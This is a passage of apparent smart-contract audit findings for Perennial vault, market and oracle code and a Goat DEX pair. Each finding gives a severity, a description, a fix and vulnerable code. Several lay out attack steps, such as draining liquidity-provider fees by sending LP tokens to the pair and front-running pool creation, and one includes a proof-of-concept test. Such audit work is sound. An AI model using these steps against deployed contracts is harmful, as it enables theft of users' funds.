If the second-to-last line is commented out (no \"min position\" created in the market), it will work normally.чRemove `add(withdrawal)` from `_ineligable` calculation in the vault.чIn certain situations (redeem not possible from the vault due to high skew in some underlying market) claiming assets from the vault will revert for all users, temporarily (and sometimes permanently) locking user funds in the contract.ч```\\n_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero());\\n```\\n -If referral or liquidator is the same address as the account, then liquidation/referral fees will be lost due to local storage being overwritten after the `claimable` amount is credited to liquidator or referralчmediumчAny user (address) can be liquidator and/or referral, including the account's own address (the user can self-liquidate or self-refer). During the market settlement, liquidator and referral fees are credited to liquidator/referral's `local.claimable` storage. The issue is that the account's local storage is held in memory during the settlement process, and is saved into storage after settlement/update. 
This means that `local.claimable` storage changes for the account are not reflected in the in-memory cached copy and discarded when the cached copy is saved after settlement.\\nThis leads to liquidator and referral fees being lost when these are the account's own address.\\nDuring market account settlement process, in the `_processOrderLocal`, liquidator and referral fees are credited to corresponding accounts via:\\n```\\n// rest of code\\n _credit(liquidators[account][newOrderId], accumulationResult.liquidationFee);\\n _credit(referrers[account][newOrderId], accumulationResult.subtractiveFee);\\n// rest of code\\nfunction _credit(address account, UFixed6 amount) private {\\n if (amount.isZero()) return;\\n\\n Local memory newLocal = _locals[account].read();\\n newLocal.credit(amount);\\n _locals[account].store(newLocal);\\n}\\n```\\n\\nHowever, for the account the cached copy of `_locals[account]` is stored after the settlement in _storeContext:\\n```\\nfunction _storeContext(Context memory context, address account) private {\\n // state\\n _global.store(context.global);\\n _locals[account].store(context.local);\\n// rest of code\\n```\\n\\nThe order of these actions is:\\n```\\nfunction settle(address account) external nonReentrant whenNotPaused {\\n Context memory context = _loadContext(account);\\n\\n _settle(context, account);\\n\\n _storeContext(context, account);\\n}\\n```\\n\\nLoad `_locals[account]` into memory (context.local)\\nSettle: during settlement `_locals[account].claimable` is increased for liquidator and referral. 
Note: this is not reflected in `context.local`\\nStore cached context: `_locals[account]` is overwritten with the `context.local`, losing `claimable` increased during settlement.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('self-liquidation fees lost', async () => {\\nconst POSITION = parse6decimal('100.000')\\nconst COLLATERAL = parse6decimal('120')\\n\\nfunction setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n}\\n\\ndsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\n\\nvar time = TIMESTAMP;\\n\\nsetupOracle('1', time, time + 100);\\nawait market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n\\ntime += 100;\\nsetupOracle('1', time, time + 100);\\nawait market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, POSITION, 0, COLLATERAL, false);\\n\\ntime += 100;\\nsetupOracle('1', time, time + 100);\\n\\ntime += 100;\\nsetupOracle('0.7', time, time + 100);\\n\\n// self-liquidate\\nsetupOracle('0.7', time, time + 100);\\nawait market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, true);\\n\\n// settle liquidation\\ntime += 100;\\nsetupOracle('0.7', time, time + 100);\\nawait market.settle(userB.address);\\nvar info = await market.locals(userB.address);\\nconsole.log(\"Claimable userB: \" + info.claimable);\\n```\\n\\nConsole log:\\n```\\nClaimable userB: 0\\n```\\nчModify `Market._credit` function to 
increase `context.local.claimable` if account to be credited matches account which is being updated.чIf user self-liquidates or self-refers, the liquidation and referral fees are lost by the user (and are stuck in the contract, because they're still subtracted from the user's collateral).ч```\\n// rest of code\\n _credit(liquidators[account][newOrderId], accumulationResult.liquidationFee);\\n _credit(referrers[account][newOrderId], accumulationResult.subtractiveFee);\\n// rest of code\\nfunction _credit(address account, UFixed6 amount) private {\\n if (amount.isZero()) return;\\n\\n Local memory newLocal = _locals[account].read();\\n newLocal.credit(amount);\\n _locals[account].store(newLocal);\\n}\\n```\\n -_loadContext() uses the wrong pendingGlobal.чmediumч`StrategyLib._loadContext()` is using the incorrect `pendingGlobal`, causing `currentPosition`, `minPosition`, and `maxPosition` to be incorrect, leading to incorrect rebalance operation.\\nIn `StrategyLib._loadContext()`, there is a need to compute `currentPosition`, `minPosition`, and `maxPosition`. 
The code as follows:\\n```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n\\nThe code above `pendingGlobal = registration.market.pendings(address(this));` is wrong It takes the address(this)'s `pendingLocal`. The correct approach is to use `pendingGlobal = registration.market.pending();`.ч```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n// Remove the line below\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n// Add the line below\\n Order memory pendingGlobal = registration.market.pending();\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\nчSince `pendingGlobal` is wrong, `currentPosition`, `minPosition` and `maxPosition` are all 
wrong. This affects subsequent rebalance calculations, such as `target.position`, etc., so rebalance does not work properlyч```\\n function _loadContext(\\n Registration memory registration\\n ) private view returns (MarketStrategyContext memory marketContext) {\\n// rest of code\\n // current position\\n Order memory pendingGlobal = registration.market.pendings(address(this));\\n marketContext.currentPosition = registration.market.position();\\n marketContext.currentPosition.update(pendingGlobal);\\n marketContext.minPosition = marketContext.currentAccountPosition.maker\\n .unsafeSub(marketContext.currentPosition.maker\\n .unsafeSub(marketContext.currentPosition.skew().abs()).min(marketContext.closable));\\n marketContext.maxPosition = marketContext.currentAccountPosition.maker\\n .add(marketContext.riskParameter.makerLimit.unsafeSub(marketContext.currentPosition.maker));\\n }\\n```\\n -Liquidator can set up referrals for other usersчmediumчIf a user has met the liquidation criteria and currently has no referrer, then a malicious liquidator can specify a referrer in the liquidation order, 
making it impossible for subsequent users to set up the referrer they want.\\nCurrently, there are 2 conditions to set up a referrer\\nthe order cannot be empty (Non-empty orders require authorization unless they are liquidation orders)\\nthere can't be another referrer already\\n```\\n function _loadUpdateContext(\\n Context memory context,\\n address account,\\n address referrer\\n ) private view returns (UpdateContext memory updateContext) {\\n// rest of code\\n updateContext.referrer = referrers[account][context.local.currentId];\\n updateContext.referralFee = IMarketFactory(address(factory())).referralFee(referrer);\\n }\\n\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n\\n\\n function _storeUpdateContext(Context memory context, UpdateContext memory updateContext, address account) private {\\n// rest of code\\n referrers[account][context.local.currentId] = updateContext.referrer;\\n }\\n```\\n\\nHowever, if the user does not have a referrer, the liquidation order is able to meet both of these restrictions\\nThis allows the liquidator to set up referrals for other users.\\nWhen the user subsequently tries to set up a referrer, it will fail.чRestrictions on Liquidation Orders Cannot Set a referrer\\n```\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n// Add the line below\\n if (newOrder.protected() && referrer != address(0)) revert MarketInvalidReferrerError;\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if 
(updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n```\\nчIf a user is set up as a referrer by a liquidated order in advance, the user cannot be set up as anyone else.ч```\\n function _loadUpdateContext(\\n Context memory context,\\n address account,\\n address referrer\\n ) private view returns (UpdateContext memory updateContext) {\\n// rest of code\\n updateContext.referrer = referrers[account][context.local.currentId];\\n updateContext.referralFee = IMarketFactory(address(factory())).referralFee(referrer);\\n }\\n\\n function _processReferrer(\\n UpdateContext memory updateContext,\\n Order memory newOrder,\\n address referrer\\n ) private pure {\\n if (newOrder.makerReferral.isZero() && newOrder.takerReferral.isZero()) return;\\n if (updateContext.referrer == address(0)) updateContext.referrer = referrer;\\n if (updateContext.referrer == referrer) return;\\n\\n revert MarketInvalidReferrerError();\\n }\\n\\n\\n function _storeUpdateContext(Context memory context, UpdateContext memory updateContext, address account) private {\\n// rest of code\\n referrers[account][context.local.currentId] = updateContext.referrer;\\n }\\n```\\n -Vault and oracle keepers DoS in some situations due to `market.update(account,max,max,max,0,false)`чmediumчWhen user's market account is updated without position and collateral change (by calling market.update(account,max,max,max,0,false)), this serves as some kind of \"settling\" the account (which was the only way to settle the account before v2.3). However, this action still reverts if the account is below margin requirement.\\nThe issue is that some parts of the code use this action to \"settle\" the account in the assumption that it never reverts which is not true. 
This causes unexpected reverts and denial of service to users who cannot execute transactions in some situations, in particular:\\nOracle `KeeperFactory.settle` uses this method to settle all accounts in the market for the oracle version and will revert the entire market version's settlement if any account which is being settled is below margin requirement. Example scenario: 1.1. User increases position to the edge of margin requirement 1.2. The price rises slightly for the committed oracle version, and user position is settled and is now slightly below margin requirements 1.3. All attempts to settle accounts for the committed oracle version for this market will revert as user's account collateral is below margin requirements.\\nVault `Vault._updateUnderlying` uses this method to settle all vault's accounts in the markets. This function is called at the start of `rebalance` and `update`, with `rebalance` also being called before any admin vault parameter changes such as updating market leverages, weights or cap. This becomes especially problematic if any market is \"removed\" from the vault by setting its weight to 0, but the market still has some position due to the `minPosition` limitation (as described in another issue). In such a case each vault `update` will bring this market's position to the exact edge of margin requirement, meaning a lot of times minimal price changes will put the vault's market account below margin requirement, and as such most Vault functions will revert (update, `rebalance` and admin param changes). 
Moreover, since the vault rebalances collateral and/or position size only in `_manage` (which is called only from `update` and rebalance), this means that the vault is basically bricked until this position is either liquidated or goes above margin requirement again due to price changes.\\nWhen `Market.update` is called, any parameters except `protected = true` will perform the following check from the InvariantLib.validate:\\n```\\nif (\\n !PositionLib.margined(\\n context.latestPosition.local.magnitude().add(context.pending.local.pos()),\\n context.latestOracleVersion,\\n context.riskParameter,\\n context.local.collateral\\n )\\n) revert IMarket.MarketInsufficientMarginError();\\n```\\n\\nThis means that even updates which do not change anything (empty order and 0 collateral change) still perform this check and revert if the user's collateral is below margin requirement.\\nSuch method to settle accounts is used in KeeperOracle._settle:\\n```\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nThis is called from `KeeperFactory.settle`, which the keepers are supposed to call to settle market accounts after the oracle version is commited. This will revert, thus keepers will temporarily be unable to call this function for the specific oracle version until all users are at or above margin.\\nThe same method is used to settle accounts in Vault._updateUnderlying:\\n```\\nfunction _updateUnderlying() private {\\n for (uint256 marketId; marketId < totalMarkets; marketId++)\\n _registrations[marketId].read().market.update(\\n address(this),\\n UFixed6Lib.MAX,\\n UFixed6Lib.ZERO,\\n UFixed6Lib.ZERO,\\n Fixed6Lib.ZERO,\\n false\\n );\\n}\\n```\\nчDepending on intended functionality:\\nIgnore the margin requirement for empty orders and collateral change which is >= 0. 
AND/OR\\nUse `Market.settle` instead of `Market.update` to `settle` accounts, specifically in `KeeperOracle._settle` and in `Vault._updateUnderlying`. There doesn't seem to be any reason or issue to use `settle` instead of `update`, it seems that `update` is there just because there was no `settle` function available before.чKeepers are unable to settle market accounts for the commited oracle version until all accounts are above margin. The oracle fees are still taken from all accounts, but the keepers are blocked from receiving it.\\nIf any Vault's market weight is set to 0 (or if vault's position in any market goes below margin for whatever other reason), most of the time the vault will temporarily be bricked until vault's position in that market is liquidated. The only function working in this state is `Vault.settle`, even all admin functions will revert.ч```\\nif (\\n !PositionLib.margined(\\n context.latestPosition.local.magnitude().add(context.pending.local.pos()),\\n context.latestOracleVersion,\\n context.riskParameter,\\n context.local.collateral\\n )\\n) revert IMarket.MarketInsufficientMarginError();\\n```\\n -Vault checkpoints slightly incorrect conversion from assets to shares leads to slow loss of funds for long-time vault depositorsчmediumчWhen vault checkpoints convert assets to shares (specifically used to calculate user's shares for their deposit), it uses the following formula: `shares = (assets[before fee] - settlementFee) * checkpoint.shares/checkpoint.assets * (deposit + redeem - tradeFee) / (deposit + redeem)`\\n`settlementFee` in this formula is taken into account slightly incorrectly: in actual market collateral calculations, both settlement fee and trade fee are subtracted from collateral, but this formula basically multiplies `1 - settlement fee percentage` by `1 - trade fee percentage`, which is slightly different and adds the calculation error = `settlement fee percentage * trade fee percentage`.\\nThis is the scenario to better 
understand the issue:\\nLinear fee = 2%, settlement fee = $1\\nUser1 deposits $100 into the vault (linear fee = $2, settlement fee = $1)\\nVault assets = $97 (due to fees), User1 shares = 100\\nUser2 deposits $100 into the vault (linear fee = $2, settlement fee = $1)\\nVault assets = $194, User1 shares = 100, but User2 shares = 100.02, meaning User1's share value has slightly fallen due to a later deposit.\\nThis is the calculation for User2 shares: `shares = ($100 - $1) * 100/$97 * ($100 - $2) / $100 = $99 * 100/$97 * $98/$100 = $99 * 98/$97 = 100.02`\\nThe extra 0.02 this user has received is because the `tradeFee` is taken from the amount after settlement fee ($99) rather than full amount as it should ($100). This difference (settlementFee * `tradeFee` = $0.02) is unfair amount earned by User2 and loss of funds for User1.\\nWhen redeeming, the formula for shares -> assets vault checkpoint conversion is correct and the correct amount is redeemed.\\nThis issue leads to all vault depositors slowly losing share value with each deposit, and since no value is gained when redeeming, continuous deposits and redeems will lead to all long-time depositors continuously losing their funds.\\nThis is the formula for vault checkpoint toSharesGlobal:\\n```\\nfunction toSharesGlobal(Checkpoint memory self, UFixed6 assets) internal pure returns (UFixed6) {\\n // vault is fresh, use par value\\n if (self.shares.isZero()) return assets;\\n\\n // if vault is insolvent, default to par value\\n return self.assets.lte(Fixed6Lib.ZERO) ? 
assets : _toShares(self, _withoutSettlementFeeGlobal(self, assets));\\n}\\n\\nfunction _toShares(Checkpoint memory self, UFixed6 assets) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n return _withSpread(self, assets.muldiv(self.shares, selfAssets));\\n}\\n\\nfunction _withSpread(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n UFixed6 totalAmount = self.deposit.add(self.redemption.muldiv(selfAssets, self.shares));\\n UFixed6 totalAmountIncludingFee = UFixed6Lib.unsafeFrom(Fixed6Lib.from(totalAmount).sub(self.tradeFee));\\n\\n return totalAmount.isZero() ?\\n amount :\\n amount.muldiv(totalAmountIncludingFee, totalAmount);\\n}\\n\\nfunction _withoutSettlementFeeGlobal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n return _withoutSettlementFee(amount, self.settlementFee);\\n}\\n\\nfunction _withoutSettlementFee(UFixed6 amount, UFixed6 settlementFee) private pure returns (UFixed6) {\\n return amount.unsafeSub(settlementFee);\\n}\\n```\\n\\nThis code translates to a formula shown above, i.e. it first subtracts settlement fee from the assets (withoutSettlementFeeGlobal), then multiplies this by checkpoint's share value in `_toShares` (*checkpoint.shares/checkpoint.assets), and then multiplies this by trade fee adjustment in `_withSpread` (*(deposit+redeem-tradeFee) / (deposit+redeem)). 
Here is the formula again: `shares = (assets[before fee] - settlementFee) * checkpoint.shares/checkpoint.assets * (deposit + redeem - tradeFee) / (deposit + redeem)`\\nAs shown above, the formula is incorrect, because it basically does the following: `user_assets = (deposit - settlementFee) * (deposit - tradeFee)/deposit = deposit * (1 - settlementFeePct) * (1 - tradeFeePct)`\\nBut the actual user collateral after fees is calculated as: `user_assets = deposit - settlementFee - tradeFee = deposit * (1 - settlementFeePct - tradeFeePct)`\\nIf we subtract the actual collateral from the formula used in checkpoint, we get the error: `error = deposit * ((1 - settlementFeePct) * (1 - tradeFeePct) - (1 - settlementFeePct - tradeFeePct))` `error = deposit * settlementFeePct * tradeFeePct` `error = settlementFee * tradeFeePct`\\nSo this is systematic error, which inflates the shares given to users with any deposit by fixed amount of `settlementFee * tradeFeePct`чRe-work the assets to shares conversion in vault checkpoint to use the correct formula: `shares = (assets[before fee] - settlementFee - tradeFee * assets / (deposit + redeem)) * checkpoint.shares/checkpoint.assets`чAny vault deposit reduces the vault assets by `settlementFee * tradeFeePct`. While this amount is not very large (in the order of $0.1 - $0.001 per deposit transaction), this is amount lost with each deposit, and given that an active vault can easily have 1000s of transactions daily, this will be a loss of $1-$100/day, which is significant enough to make it a valid issue.ч```\\nfunction toSharesGlobal(Checkpoint memory self, UFixed6 assets) internal pure returns (UFixed6) {\\n // vault is fresh, use par value\\n if (self.shares.isZero()) return assets;\\n\\n // if vault is insolvent, default to par value\\n return self.assets.lte(Fixed6Lib.ZERO) ? 
assets : _toShares(self, _withoutSettlementFeeGlobal(self, assets));\\n}\\n\\nfunction _toShares(Checkpoint memory self, UFixed6 assets) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n return _withSpread(self, assets.muldiv(self.shares, selfAssets));\\n}\\n\\nfunction _withSpread(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n UFixed6 totalAmount = self.deposit.add(self.redemption.muldiv(selfAssets, self.shares));\\n UFixed6 totalAmountIncludingFee = UFixed6Lib.unsafeFrom(Fixed6Lib.from(totalAmount).sub(self.tradeFee));\\n\\n return totalAmount.isZero() ?\\n amount :\\n amount.muldiv(totalAmountIncludingFee, totalAmount);\\n}\\n\\nfunction _withoutSettlementFeeGlobal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n return _withoutSettlementFee(amount, self.settlementFee);\\n}\\n\\nfunction _withoutSettlementFee(UFixed6 amount, UFixed6 settlementFee) private pure returns (UFixed6) {\\n return amount.unsafeSub(settlementFee);\\n}\\n```\\n -ChainlinkFactory will pay non-requested versions keeper feesчmediumчProtocol definition: `Requested versions will pay out a keeper fee, non-requested versions will not.` But ChainlinkFactory ignores `numRequested`, which pays for both.\\nProtocol definition: `Requested versions will pay out a keeper fee, non-requested versions will not.`\\n```\\n /// @notice Commits the price to specified version\\n /// @dev Accepts both requested and non-requested versions.\\n /// Requested versions will pay out a keeper fee, non-requested versions will not.\\n /// Accepts any publish time in the underlying price message, as long as it is within the validity window,\\n /// which means its possible for publish times to be slightly out of order with respect to versions.\\n /// Batched updates are supported by passing in a list of price feed ids along with a valid batch update data.\\n /// 
@param ids The list of price feed ids to commit\\n /// @param version The oracle version to commit\\n /// @param data The update data to commit\\n function commit(bytes32[] memory ids, uint256 version, bytes calldata data) external payable {\\n```\\n\\ncommit()->_handleKeeperFee()->_applicableValue() `ChainlinkFactory._applicableValue ()` implements the following:\\n```\\n function _applicableValue(uint256, bytes memory data) internal view override returns (uint256) {\\n bytes[] memory payloads = abi.decode(data, (bytes[]));\\n uint256 totalFeeAmount = 0;\\n for (uint256 i = 0; i < payloads.length; i++) {\\n (, bytes memory report) = abi.decode(payloads[i], (bytes32[3], bytes));\\n (Asset memory fee, ,) = feeManager.getFeeAndReward(address(this), report, feeTokenAddress);\\n totalFeeAmount += fee.amount;\\n }\\n return totalFeeAmount;\\n }\\n```\\n\\nThe above method ignores the first parameter `numRequested`. This way, whether it is `Requested versions` or not, you will pay `keeper fees`. 
Violating `non-requested versions will not pay`чIt is recommended that only `Requested versions` keeper fees'\\n```\\n// Remove the line below\\n function _applicableValue(uint256 , bytes memory data) internal view override returns (uint256) {\\n// Add the line below\\n function _applicableValue(uint256 numRequested, bytes memory data) internal view override returns (uint256) {\\n bytes[] memory payloads = abi.decode(data, (bytes[]));\\n uint256 totalFeeAmount = 0;\\n for (uint256 i = 0; i < payloads.length; i// Add the line below\\n// Add the line below\\n) {\\n (, bytes memory report) = abi.decode(payloads[i], (bytes32[3], bytes));\\n (Asset memory fee, ,) = feeManager.getFeeAndReward(address(this), report, feeTokenAddress);\\n totalFeeAmount // Add the line below\\n= fee.amount;\\n }\\n// Remove the line below\\n return totalFeeAmount;\\n// Add the line below\\n return totalFeeAmount * numRequested / payloads.length ;\\n }\\n```\\nчIf `non-requested versions` will pay as well, it is easy to maliciously submit `non-requested` maliciously consume `ChainlinkFactory` fees balance (Note that needs at least one numRequested to call `_handleKeeperFee()` )ч```\\n /// @notice Commits the price to specified version\\n /// @dev Accepts both requested and non-requested versions.\\n /// Requested versions will pay out a keeper fee, non-requested versions will not.\\n /// Accepts any publish time in the underlying price message, as long as it is within the validity window,\\n /// which means its possible for publish times to be slightly out of order with respect to versions.\\n /// Batched updates are supported by passing in a list of price feed ids along with a valid batch update data.\\n /// @param ids The list of price feed ids to commit\\n /// @param version The oracle version to commit\\n /// @param data The update data to commit\\n function commit(bytes32[] memory ids, uint256 version, bytes calldata data) external payable {\\n```\\n -Liquidity provider fees can be 
stolen from any pairчhighчAn attacker can steal the liquidity providers fees by transferring liquidity tokens to the pair and then withdrawing fees on behalf of the pair itself.\\nThis is possible because of two reasons:\\nTransferring liquidity tokens to the pair itself doesn't update the fee tracking variables:\\n```\\nif (to != address(this)) {\\n _updateFeeRewards(to);\\n}\\n```\\n\\nwhich results in the variable `feesPerTokenPaid[address(pair)]` of the pair being equal to 0.\\nThe function withdrawFees() is a permissionless function that allows anyone to withdraw fees on behalf of any address, including the pair itself.\\nBy combining these two quirks of the codebase an attacker can steal all of the currently pending liquidity provider fees by doing the following:\\nAdd liquidity to a pair, which will mint the attacker some liquidity tokens\\nTransfer the liquidity tokens to the pair directly\\nCall withdrawFees() by passing the address of the pair. Because `feesPerTokenPaid[address(pair)]` is 0 this will collect fees on behalf of the pair even if it shouldn't. 
The function will transfer an amount `x` of WETH from the pair to the pair itself and will lower the `_pendingLiquidityFee` variable by that same amount\\nBecause the variable `_pendingLiquidityFee` has been lowered by `x` the pool will assume someone transferred `x` WETH to it\\nAt this point the attacker can take advantage of this however he likes, but for the sake of the example let's suppose he calls swap() to swap `x` ETH into tokens that will be transferred to his wallet\\nThe attacker burns the liquidity transferred at point `2` to recover his funds\\nPOC\\nчIn withdrawFees(pair) add a require statement to prevent fees being withdrawn on behalf of the pool.\\n```\\nrequire(to != address(this));\\n```\\nчLiquidity provider fees can be stolen from any pair.ч```\\nif (to != address(this)) {\\n _updateFeeRewards(to);\\n}\\n```\\n -Some unusual problems arise in the use of the `GoatV1Factory.sol#createPair()` function.чmediumчIf you create a new pool for tokens and add liquidity using the `GoatRouterV1.sol#addLiquidity()` function, the bootstrap function of the protocol is broken. Therefore, an attacker can perform the front running attack on the `GoatRouterV1.sol#addLiquidity()` function by front calling `GoatV1Factory.sol#createPair()`.\\nIf a pool for the token does not exist, the LP can create a new pool using the `GoatV1Factory.sol#createPair()` function. Next he calls `GoatRouterV1.sol#addLiquidity()` to provide liquidity. 
At this time, the amount of WETH and ERC20Token provided to the pool is calculated in the `GoatRouterV1.sol#_addLiquidity()` function.\\n```\\n function _addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n GoatTypes.InitParams memory initParams\\n ) internal returns (uint256, uint256, bool) {\\n GoatTypes.LocalVariables_AddLiquidity memory vars;\\n GoatV1Pair pair = GoatV1Pair(GoatV1Factory(FACTORY).getPool(token));\\n if (address(pair) == address(0)) {\\n // First time liquidity provider\\n pair = GoatV1Pair(GoatV1Factory(FACTORY).createPair(token, initParams));\\n vars.isNewPair = true;\\n }\\n\\n if (vars.isNewPair) {\\n// rest of codeSNIP\\n } else {\\n /**\\n * @dev This block is accessed after the presale period is over and the pool is converted to AMM\\n */\\n (uint256 wethReserve, uint256 tokenReserve) = pair.getReserves();\\n uint256 tokenAmountOptimal = GoatLibrary.quote(wethDesired, wethReserve, tokenReserve);\\n if (tokenAmountOptimal <= tokenDesired) {\\n if (tokenAmountOptimal < tokenMin) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n (vars.tokenAmount, vars.wethAmount) = (tokenAmountOptimal, wethDesired);\\n } else {\\n uint256 wethAmountOptimal = GoatLibrary.quote(tokenDesired, tokenReserve, wethReserve);\\n assert(wethAmountOptimal <= wethDesired);\\n if (wethAmountOptimal < wethMin) revert GoatErrors.InsufficientWethAmount();\\n (vars.tokenAmount, vars.wethAmount) = (tokenDesired, wethAmountOptimal);\\n }\\n }\\n return (vars.tokenAmount, vars.wethAmount, vars.isNewPair);\\n }\\n```\\n\\nFor simplicity, let's only consider from #L250 to #L256.\\nL250:wethReserve = virtualEth, tokenReserve = initialTokenMatch - (initialTokenMatch - ((virtualEth * initialTokenMatch)/(virtualEth + bootstrapEth)) + + (virtualEthinitialTokenMatchbootstrapEth)/(virtualEth + bootstrapEth) ^ 2) = = ((virtualEth * initialTokenMatch)/(virtualEth + bootstrapEth)) - 
(virtualEthinitialTokenMatchbootstrapEth)/(virtualEth + bootstrapEth) ^ 2 L251:tokenAmountOptimal = wethDesired * wethReserve / tokenReserve vars.tokenAmount = tokenAmountOptimal vars.wethAmount = wethDesired\\nAt this time, At this time, the calculated balance of ETH and token is sent to the pool, and `GoatV1Pair(vars.pair).mint()` is called in the `GoatRouterV1.sol#addLiquidity()` function.\\n```\\n function addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n address to,\\n uint256 deadline,\\n GoatTypes.InitParams memory initParams\\n ) external nonReentrant ensure(deadline) returns (uint256, uint256, uint256) {\\n// rest of codeSNIP\\n IERC20(vars.token).safeTransferFrom(msg.sender, vars.pair, vars.actualTokenAmount);\\n if (vars.wethAmount != 0) {\\n IERC20(WETH).safeTransferFrom(msg.sender, vars.pair, vars.wethAmount);\\n }\\n vars.liquidity = GoatV1Pair(vars.pair).mint(to);\\n// rest of codeSNIP\\n }\\n```\\n\\nNext, the `GoatV1Pair(vars.pair).mint()` function checks the validity of the transmitted token.\\n```\\n function mint(address to) external nonReentrant returns (uint256 liquidity) {\\n // rest of codeSNIP\\n if (_vestingUntil == _MAX_UINT32) {\\n // Do not allow to add liquidity in presale period\\n if (totalSupply_ > 0) revert GoatErrors.PresalePeriod();\\n // don't allow to send more eth than bootstrap eth\\n if (balanceEth > mintVars.bootstrapEth) {\\n revert GoatErrors.SupplyMoreThanBootstrapEth();\\n }\\n\\n if (balanceEth < mintVars.bootstrapEth) {\\n (uint256 tokenAmtForPresale, uint256 tokenAmtForAmm) = _tokenAmountsForLiquidityBootstrap(\\n mintVars.virtualEth, mintVars.bootstrapEth, balanceEth, mintVars.initialTokenMatch\\n );\\n if (balanceToken != (tokenAmtForPresale + tokenAmtForAmm)) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n liquidity =\\n Math.sqrt(uint256(mintVars.virtualEth) * uint256(mintVars.initialTokenMatch)) - MINIMUM_LIQUIDITY;\\n } else 
{\\n // This means that user is willing to make this pool an amm pool in first liquidity mint\\n liquidity = Math.sqrt(balanceEth * balanceToken) - MINIMUM_LIQUIDITY;\\n uint32 timestamp = uint32(block.timestamp);\\n _vestingUntil = timestamp + VESTING_PERIOD;\\n }\\n mintVars.isFirstMint = true;\\n }\\n // rest of codeSNIP\\n }\\n```\\n\\nIn here, `balanceToken = vars.tokenAmount (value:tokenAmountOptimal)` and `tokenAmtForPresale + tokenAmtForAmm` is calculated follows.\\ntokenAmtForPresale = initialTokenMatch - (virtualEth * initialTokenMatch / (virtualEth + bootstrapEth)) - - (balanceEth(value:wethDesired)*initialTokenMatch/(virtualEth+balanceEth)) tokenAmtForAmm = (virtualEth * initialTokenMatch * bootstrapEth) / (virtualEth + bootstrapEth) ^ 2\\nAs a result, `(balanceToken != (tokenAmtForPresale + tokenAmtForAmm)) == true`, the `GoatRouterV1.sol#addLiquidity()` function is reverted. In this case, If the initial LP want to provide liquidity to the pool, he must pay an amount of WETH equivalent to bootstrapEth to execute #L146. 
